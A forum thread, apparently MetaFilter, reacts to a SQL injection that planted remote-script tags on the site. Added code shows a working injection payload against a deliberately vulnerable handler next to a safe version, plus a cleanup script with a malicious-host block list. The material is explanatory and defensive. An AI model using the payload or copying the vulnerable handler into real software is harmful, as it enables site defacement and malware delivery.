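Added example, not code from this thread or from MetaFilter: the class of bug Jofus is guessing at above. A profile-save handler that splices the submitted text into its UPDATE lets a single submission rewrite every row in the table; the parameterised version stores the same submission as inert text. It runs on Python's built-in sqlite3 with an in-memory database. The `profiles` table, its columns, the 30-character cut and the payload shape are assumptions made for illustration, not MetaFilter's schema or the actual payload used against the site.

```python
"""Added illustration of a mass-overwrite SQL injection (constructed example,
not MetaFilter's code). The table, columns and payload are assumptions."""
import sqlite3

# The tag members reported seeing in their profile fields.
TAG = "<script src=http://tejary.net/h.js></script>"

# A submitted "bio" that closes the string literal, keeps the first 30
# characters of whatever each row already held, appends the tag, then comments
# out the WHERE clause that was meant to limit the update to one user.
# (Constructed payload for this example.)
PAYLOAD = f"' || substr(bio, 1, 30) || '{TAG}' WHERE 1=1 --"


def fresh_db():
    """In-memory database with two constructed profile rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE profiles (id INTEGER PRIMARY KEY, username TEXT, bio TEXT);
        INSERT INTO profiles (username, bio) VALUES
          ('writer', 'Writer by day, reader by night; ask me about fountain pens.'),
          ('lurker', 'Mostly here for the green.');
    """)
    return conn


def all_bios(conn):
    return [row[0] for row in conn.execute("SELECT bio FROM profiles ORDER BY id")]


def save_bio_vulnerable(conn, user_id, bio):
    # String formatting: the submitted text becomes part of the statement.
    sql = f"UPDATE profiles SET bio = '{bio}' WHERE id = {int(user_id)}"
    conn.execute(sql)
    conn.commit()


def save_bio_safe(conn, user_id, bio):
    # Placeholders: the driver passes the text as a value, never as SQL.
    conn.execute("UPDATE profiles SET bio = ? WHERE id = ?", (bio, int(user_id)))
    conn.commit()


def demo():
    """Return (bios after the vulnerable save, bios after the safe save)."""
    conn = fresh_db()
    save_bio_vulnerable(conn, 2, PAYLOAD)   # user 2 submits the payload...
    hit = all_bios(conn)                    # ...and every row now carries the tag

    conn = fresh_db()
    save_bio_safe(conn, 2, PAYLOAD)         # same payload through a placeholder
    safe = all_bios(conn)                   # row 1 untouched, row 2 holds literal text
    return hit, safe


if __name__ == "__main__":
    hit, safe = demo()
    for b in hit:
        print("vulnerable:", b)
    for b in safe:
        print("safe:      ", b)
```

The point to take from the vulnerable path is that the user never needed write access to anyone else's row: one quote character turns a per-user UPDATE into a table-wide one, and the `substr` keeps just enough of the original text for the page to still look roughly right at a glance. The safe path stores the payload verbatim in the submitting user's own row and nowhere else; whether it is later rendered as HTML is a separate output-encoding question.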


It had happened to me too.

I edited my profile to remove all compromised fields and stopped displaying my email to other members (though that field is still compromised as I too am hesitant to enter my password to change it).

So far it hasn't recurred. I'm running opera on linux and didn't see any warnings about sites.
posted by knapah at 7:21 AM on January 24 [+] [!]


Great fiddly fuck. Good morning.
posted by cortex at 7:23 AM on January 24 [10 favorites +] [!]


Best of luck to Matt and pb today.

If they choose to shut the site down while they get their situation figured out, I guess I'll see y'all on the other side.
posted by popechunk at 7:23 AM on January 24 [+] [!]


This will probably be covered in President Obama's YouTube address today.
posted by ALongDecember at 7:25 AM on January 24 [1 favorite +] [!]


Also, I noticed maybe an hour and a half or so ago that the site was strangely unresponsive. That could be when the attack was being executed.

It was at about 2pm UK time that I noticed it.
posted by vacapinta at 7:25 AM on January 24 [+] [!]


Just an FYI, make sure to check the smaller font size box, because mine had the script in it as well. Was sorta easy to pass up on first glance.
posted by deezil at 7:25 AM on January 24 [+] [!]


I can't bring myself to twitter at the mods about this...

On preview, ah good cortex is here.
posted by Pronoiac at 7:27 AM on January 24 [+] [!]


I'm on FF with No Script. Everything including AskMe looks fine to me. The only effect I see is most of my profile is gone and the email address field is compromised.

I'm most worried about the mod silence. What if the attack wasn't just virtual?

/toomanymovies
posted by CunningLinguist at 7:28 AM on January 24 [1 favorite +] [!]


Hi cortex! What's up?
posted by Jofus at 7:28 AM on January 24 [+] [!]


Never mind. Hiya Cortex and Vaca! Shall I make coffee?
posted by CunningLinguist at 7:29 AM on January 24 [+] [!]


"What if the attack wasn't just virtual?"

OMG THE MODS ARE BEING APPENDED...

TO
posted by mr_crash_davis mark II: Jazz Odyssey at 7:29 AM on January 24 [+] [!]


I'm on FF with No Script. Everything including AskMe looks fine to me. The only effect I see is most of my profile is gone and the email address field is compromised.

I'm on FF/NoScript/Linux as well, so whatever it's supposed to do (redirect to some penis pill site or something?) isn't happening, but if you edit your profile you'll see that script tags have been appended/inserted into every field. If you just edit them out, that will fix your profile at least.
posted by DecemberBoy at 7:31 AM on January 24 [+] [!]


SUP DAWG, WE HEARD YOU LIKED MEFI, SO WE INJECTED VIRII IN THE SQL (SO YOU CAN INFECT WHILE YOU FILTER).
posted by JonnyRotten at 7:31 AM on January 24 [1 favorite +] [!]


EVERYONE START FREAKING OUT
posted by dead cousin ted at 7:34 AM on January 24 [+] [!]


Fixing my profile now (it needed changing anyway), and grateful for the namedrop of Malwarebytes. I'm really embarrassingly bad about computer safety, but fortunately it said I was OK.
posted by jinjo at 7:35 AM on January 24 [+] [!]


In b4 reboot.
posted by Science! at 7:35 AM on January 24 [+] [!]


Looks like on AskMe they injected the tags into the category table, so they show up after all the "posts by category" links on the right and the category links for each post.
posted by DecemberBoy at 7:36 AM on January 24 [+] [!]


Btw, it was worth it just to get rid of that god awful pink profile page.
posted by dead cousin ted at 7:37 AM on January 24 [+] [!]


I just woke pb up. Man this looks like bad news.
posted by cortex at 7:37 AM on January 24 [+] [!]


Shall I make coffee?

Looks like y'all are getting this under control here, so I'm gonna go on a McMuffin run. Who wants what? Raise your hand for sausage. Okay... Hold on, lemme get a pen.
posted by Greg Nog at 7:37 AM on January 24 [+] [!]


Fixing my profile now (it needed changing anyway)

This is pointless / futile - any solution will have to involve reverting the whole site to an earlier backup.
posted by Meatbomb at 7:37 AM on January 24 [+] [!]


Yeah, I didn't put in anything new. Just took the stuff out.
posted by jinjo at 7:40 AM on January 24 [+] [!]


I feel bad for the mods. What a shitty way to start the weekend. Hope it's not too much of a bear to fix.
posted by lysistrata at 7:41 AM on January 24 [+] [!]


For the love of god don't visit a known-infected site with IE. That's like begging an XDR-TB patient to cough on you.

Stick with FF and NoScript and you'll be fine.
posted by Skorgu at 7:41 AM on January 24 [+] [!]


Decrudding the database might take a while - but the psecurity fix itself should be fairly simple-soup.
posted by Jofus at 7:42 AM on January 24 [+] [!]


:(
posted by ThePinkSuperhero at 7:43 AM on January 24 [1 favorite +] [!]


Yes. Psecurity. In a crisis, its important to a) remain calm and b) make words up.
posted by Jofus at 7:43 AM on January 24 [1 favorite +] [!]


This never happened when the Republicans were in charge.
posted by octothorpe at 7:43 AM on January 24 [+] [!]


I feel bad for the mods.

I feel bad for whoever did this. They are going to be in a world of hurt when the Mefi vigilante militia tracks them down. And they will.
posted by CunningLinguist at 7:43 AM on January 24 [+] [!]


Psecurity: the new defense against psedocode attack vectors.
posted by milquetoast at 7:45 AM on January 24 [+] [!]


Projects, Music and Jobs are all hit pretty bad: the script tags have been injected into all the post links. MeTa and the Blue appear to be clean.

I feel bad for the mods. What a shitty way to start the weekend. Hope it's not too much of a bear to fix.

The only way to really fix it is to load an earlier backup. The attack overwrites everything after the first 30 characters of text with the script tags - look at Projects (only if you're on FF/NoScript) to see what I mean. If it weren't for that, it would be easier to fix since they only injected the exact same script tags into everything.
posted by DecemberBoy at 7:46 AM on January 24 [+] [!]
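Added example, not from the thread or from MetaFilter: triage of a text dump once the injected tag is known. DecemberBoy's two comments above separate two cases that need different handling: rows that merely had the tag appended (strip it and the text is whole) and rows cut to their first 30 characters before the tag was added (stripping leaves a stub, and only a backup can restore it). The code below sorts field values into those two piles. The sample rows, table and column names are constructed; tejary.net and kodim.net are the two hosts named as malicious in this thread, and the frame-tag form used for kodim.net is an assumption.

```python
"""Added triage helper for script/frame tags injected into database text
fields (constructed example; row data, table and column names are made up)."""
import re
from urllib.parse import urlparse

# Hosts this thread names as malicious. Matching on host rather than on the
# exact tag string means a second variant of the tag is still caught, while a
# legitimate script or frame pointing elsewhere is left alone.
BAD_HOSTS = {"tejary.net", "kodim.net"}

# <script|iframe|frame ... src=URL ...> with an optional matching close tag.
TAG_RE = re.compile(
    r"<(script|iframe|frame)\b[^>]*\bsrc\s*=\s*[\"']?(?P<url>[^\s\"'>]+)[\"']?[^>]*>"
    r"(?:\s*</\1\s*>)?",
    re.IGNORECASE,
)

CUT = 30  # characters the attack kept before appending its tag (per the thread)


def _bad_host(url):
    host = (urlparse(url).hostname or "").lower()
    return host in BAD_HOSTS or host.endswith(tuple("." + h for h in BAD_HOSTS))


def strip_injected(value):
    """Remove tags whose src points at a known-bad host.
    Returns (cleaned_text, number_of_tags_removed)."""
    removed = 0

    def repl(m):
        nonlocal removed
        if _bad_host(m.group("url")):
            removed += 1
            return ""
        return m.group(0)          # not ours: keep the tag as it was

    return TAG_RE.sub(repl, value), removed


def triage(value):
    """Return (cleaned_text, injected, truncated) for one field value.

    truncated flags probable data loss: a tag was present and the text in
    front of it is exactly CUT characters, which is what cut-then-append
    produces. A field that genuinely was 30 characters long is flagged too;
    a false alarm here is cheaper than silently keeping a stub."""
    cleaned, n = strip_injected(value)
    if n == 0:
        return value, False, False
    return cleaned, True, len(cleaned) == CUT


def triage_rows(rows):
    """rows: iterable of (table, id, column, value).
    Returns (fixes, restore): fixes are (table, id, column, cleaned) tuples that
    can be written back; restore lists keys whose content must come from backup."""
    fixes, restore = [], []
    for table, row_id, column, value in rows:
        cleaned, injected, truncated = triage(value)
        if not injected:
            continue
        if truncated:
            restore.append((table, row_id, column))
        else:
            fixes.append((table, row_id, column, cleaned))
    return fixes, restore


# Constructed sample rows in the shape the thread describes.
SAMPLE = [
    ("profiles", 1, "bio", "Writer by day, reader by night<script src=http://tejary.net/h.js></script>"),
    ("profiles", 1, "email", "someone@example.org<script src=http://tejary.net/h.js></script>"),
    ("profiles", 2, "website", '<iframe src="http://kodim.net/CONTENT/faq.htm" width=0 height=0></iframe>'),
    ("categories", 7, "name", "computers & internet<script src=http://tejary.net/h.js></script>"),
    ("profiles", 3, "bio", "Nothing to see here."),
    ("profiles", 4, "bio", "embeds <script src=http://example.org/widget.js></script> on purpose"),
]

if __name__ == "__main__":
    fixes, restore = triage_rows(SAMPLE)
    for f in fixes:
        print("clean:  ", f)
    for r in restore:
        print("restore:", r)
```

Run it over an export of every text column rather than the tables people have noticed so far: the thread has already found the tag in profiles, AskMe categories and post links, and a pass keyed on the host list will turn up the remaining ones. Rows in the restore list are the reason a cleanup script alone is not a fix; they need the pre-attack backup, which is the point Meatbomb and DecemberBoy make above.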


I just wanna add, if you have firefox with noscript, don't ever get careless and turn "allow scripts globally" on in noscript. Recently I got hit with a drive by download that way and ended up with some fricking thing called "ms antispyware 2009" installing itself along with a bunch of its friends. And no, I didn't click "yes" or "accept" at any point.
posted by fleetmouse at 7:46 AM on January 24 [+] [!]


I removed the links from my profile just to be careful (I know it'll be backup-resurrected, but I needed to feel helpful) and I'm thankfully behind a security system set to "Paranoid" so I hope nothing leaked through. Changed password, of course.

Side Note: I've only got room in the shelter for 3. I'm taking applications now.
posted by The Whelk at 7:46 AM on January 24 [+] [!]


I just shut down profile pages, assessing the damage now.
posted by pb at 7:48 AM on January 24 [+] [!]


Googling suggests it's not just us, at least.
posted by cortex at 7:49 AM on January 24 [+] [!]


I feel bad for whoever did this. They are going to be in a world of hurt when the Mefi vigilante militia tracks them down. And they will.

Here's one member already on the phone with the spammer. Note: He loves MeFi so much he says it's like a daughter to him.
posted by ALongDecember at 7:49 AM on January 24 [+] [!]

